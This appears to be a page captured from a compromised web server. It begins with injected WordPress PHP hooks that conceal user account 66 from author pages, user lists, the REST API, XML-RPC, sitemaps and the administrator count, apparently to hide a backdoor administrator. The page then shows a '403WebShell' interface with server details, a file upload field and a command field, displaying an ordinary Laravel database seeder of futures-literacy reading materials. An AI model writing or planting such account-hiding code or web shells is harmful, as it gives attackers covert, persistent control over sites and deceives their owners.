add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/flnavigator/database/seeders/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/flnavigator/database/seeders/DatabaseSeeder.php
<?php

namespace Database\Seeders;

use App\Models\Material;
use App\Models\Tag;
use App\Models\TagCategory;
use Illuminate\Database\Seeder;

class DatabaseSeeder extends Seeder
{
    public function run(): void
    {
        // Tag-Kategorien für Futures Literacy
        $themen = TagCategory::create(['name' => 'Themen', 'slug' => 'themen', 'sort_order' => 1]);
        $methoden = TagCategory::create(['name' => 'Methoden', 'slug' => 'methoden', 'sort_order' => 2]);
        $zeitrahmen = TagCategory::create(['name' => 'Zeitrahmen', 'slug' => 'zeitrahmen', 'sort_order' => 3]);
        $format = TagCategory::create(['name' => 'Format', 'slug' => 'format', 'sort_order' => 4]);

        // Themen-Tags
        $tagScenarioPlanning = Tag::create(['name' => 'Scenario Planning', 'slug' => 'scenario-planning', 'color' => '#6366f1', 'category_id' => $themen->id]);
        $tagForesight = Tag::create(['name' => 'Strategic Foresight', 'slug' => 'strategic-foresight', 'color' => '#8b5cf6', 'category_id' => $themen->id]);
        $tagFuturesLiteracy = Tag::create(['name' => 'Futures Literacy', 'slug' => 'futures-literacy', 'color' => '#a855f7', 'category_id' => $themen->id]);
        $tagTransformation = Tag::create(['name' => 'Transformation', 'slug' => 'transformation', 'color' => '#ec4899', 'category_id' => $themen->id]);
        $tagNachhaltigkeit = Tag::create(['name' => 'Nachhaltigkeit', 'slug' => 'nachhaltigkeit', 'color' => '#10b981', 'category_id' => $themen->id]);
        $tagDigitalisierung = Tag::create(['name' => 'Digitalisierung', 'slug' => 'digitalisierung', 'color' => '#3b82f6', 'category_id' => $themen->id]);
        $tagGesellschaft = Tag::create(['name' => 'Gesellschaft', 'slug' => 'gesellschaft', 'color' => '#f59e0b', 'category_id' => $themen->id]);

        // Methoden-Tags
        $tagWorkshop = Tag::create(['name' => 'Workshop-Methode', 'slug' => 'workshop-methode', 'color' => '#14b8a6', 'category_id' => $methoden->id]);
        $tagVisualisierung = Tag::create(['name' => 'Visualisierung', 'slug' => 'visualisierung', 'color' => '#06b6d4', 'category_id' => $methoden->id]);
        $tagSystemisch = Tag::create(['name' => 'Systemisches Denken', 'slug' => 'systemisches-denken', 'color' => '#0ea5e9', 'category_id' => $methoden->id]);

        // Zeitrahmen-Tags
        $tagKurzfristig = Tag::create(['name' => 'Kurzfristig (0-5 Jahre)', 'slug' => 'kurzfristig', 'color' => '#84cc16', 'category_id' => $zeitrahmen->id]);
        $tagMittelfristig = Tag::create(['name' => 'Mittelfristig (5-15 Jahre)', 'slug' => 'mittelfristig', 'color' => '#eab308', 'category_id' => $zeitrahmen->id]);
        $tagLangfristig = Tag::create(['name' => 'Langfristig (15+ Jahre)', 'slug' => 'langfristig', 'color' => '#f97316', 'category_id' => $zeitrahmen->id]);

        // Format-Tags
        $tagEinstieg = Tag::create(['name' => 'Einstieg', 'slug' => 'einstieg', 'color' => '#22c55e', 'category_id' => $format->id]);
        $tagVertiefung = Tag::create(['name' => 'Vertiefung', 'slug' => 'vertiefung', 'color' => '#f43f5e', 'category_id' => $format->id]);
        $tagPraxis = Tag::create(['name' => 'Praxisbeispiel', 'slug' => 'praxisbeispiel', 'color' => '#a855f7', 'category_id' => $format->id]);

        // Beispiel-Materialien
        $m1 = Material::create([
            'title' => 'The Art of the Long View',
            'description' => 'Peter Schwartz\' Klassiker über Scenario Planning. Ein grundlegendes Werk für jeden, der sich mit strategischer Vorausschau beschäftigt.',
            'type' => 'book',
            'author' => 'Peter Schwartz',
            'source' => 'Currency Doubleday',
            'url' => 'https://www.amazon.de/Art-Long-View-Planning-Uncertain/dp/0385267320',
        ]);
        $m1->tags()->attach([$tagScenarioPlanning->id, $tagForesight->id, $tagEinstieg->id, $tagLangfristig->id]);

        $m2 = Material::create([
            'title' => 'Futures Literacy: An Essential Competency for the 21st Century',
            'description' => 'Riel Miller erklärt das Konzept der Futures Literacy und warum es eine Schlüsselkompetenz für das 21. Jahrhundert ist.',
            'type' => 'article',
            'author' => 'Riel Miller',
            'source' => 'UNESCO',
            'url' => 'https://unesdoc.unesco.org/ark:/48223/pf0000243278',
        ]);
        $m2->tags()->attach([$tagFuturesLiteracy->id, $tagEinstieg->id, $tagGesellschaft->id]);

        $m3 = Material::create([
            'title' => 'The Futures Podcast',
            'description' => 'Podcast über Zukunftsforschung und Foresight mit Interviews von führenden Experten auf dem Gebiet.',
            'type' => 'podcast',
            'author' => 'Future Today Institute',
            'url' => 'https://futuretodayinstitute.com/podcast/',
        ]);
        $m3->tags()->attach([$tagForesight->id, $tagDigitalisierung->id, $tagTransformation->id]);

        $m4 = Material::create([
            'title' => 'Scenario Planning Introduction (YouTube)',
            'description' => 'Eine visuelle Einführung in die Methode des Scenario Planning mit praktischen Beispielen.',
            'type' => 'video',
            'author' => 'Shell Global',
            'url' => 'https://www.youtube.com/watch?v=example',
        ]);
        $m4->tags()->attach([$tagScenarioPlanning->id, $tagVisualisierung->id, $tagEinstieg->id, $tagWorkshop->id]);

        $m5 = Material::create([
            'title' => 'Transformation Design – Die Welt verändern',
            'description' => 'Ein Leitfaden für die Gestaltung gesellschaftlicher Transformationsprozesse.',
            'type' => 'book',
            'author' => 'Harald Welzer',
            'source' => 'S. Fischer',
        ]);
        $m5->tags()->attach([$tagTransformation->id, $tagNachhaltigkeit->id, $tagGesellschaft->id, $tagVertiefung->id]);

        $m6 = Material::create([
            'title' => 'Three Horizons Framework',
            'description' => 'Ein einfaches aber mächtiges Framework um über Transformation und verschiedene Zeithorizonte nachzudenken.',
            'type' => 'article',
            'author' => 'Kate Raworth',
            'url' => 'https://www.kateraworth.com/three-horizons/',
        ]);
        $m6->tags()->attach([$tagSystemisch->id, $tagForesight->id, $tagWorkshop->id, $tagMittelfristig->id]);

        $m7 = Material::create([
            'title' => 'Zukunftsbilder 2045 – Wie sieht Deutschland morgen aus?',
            'description' => 'Szenarien für Deutschland in 20 Jahren, entwickelt vom Bundesministerium für Bildung und Forschung.',
            'type' => 'document',
            'author' => 'BMBF',
            'source' => 'Bundesministerium für Bildung und Forschung',
            'url' => 'https://www.bmbf.de',
        ]);
        $m7->tags()->attach([$tagScenarioPlanning->id, $tagGesellschaft->id, $tagLangfristig->id, $tagPraxis->id]);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit